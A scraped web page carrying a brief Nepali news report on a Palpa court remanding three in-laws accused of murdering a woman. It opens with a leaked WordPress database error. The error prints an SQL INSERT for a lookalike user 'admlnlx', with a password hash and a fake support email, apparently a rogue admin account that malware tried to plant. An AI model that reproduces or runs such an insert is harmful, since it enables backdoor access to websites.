WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmFfhWISVTmkMJ5/ZpPyYnp4VFPqpQ0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:19:19', '', 'admlnlx', 'admlnlx')
पाल्पा, पुस ६ –
स्थानीय हेक्लाङ्ग गाविस– ६, की बिनु पुलामीको हत्याका आरोपित तिनै जनालार्ई पाल्पा जिल्ला अदालतले मुद्दा पुर्पक्षका लागि थुनामा राख्ने आदेश दिएको छ ।
थुनछेक बहसपछि जिल्ला न्यायाधीश डिल्लीरमण तिवारीको इजलासले सो मुद्दाका आरोपी पुलामीका श्रीमान् दीपेन्द्र बस्याल, ससुरा लक्ष्मण बस्याल र सासु पार्वती बस्याललाई मङ्गलबार पुर्पक्षका लागि थुनामा राख्न आदेश दिएको हो ।
बहसमा जिल्ला न्यायाधिवक्ता यदुनाथ शर्माले तिनै जनालाई ज्यान सम्बन्धी महलको १३ ९३० बमोजिम सजाय हुनुपर्ने माग गर्नुभएको थियो ।
प्रहरीले २४ औँ दिनसम्मको अनुसन्धान पछि अदालतमा सो मुद्दा दायर गरेको थियो । – रासस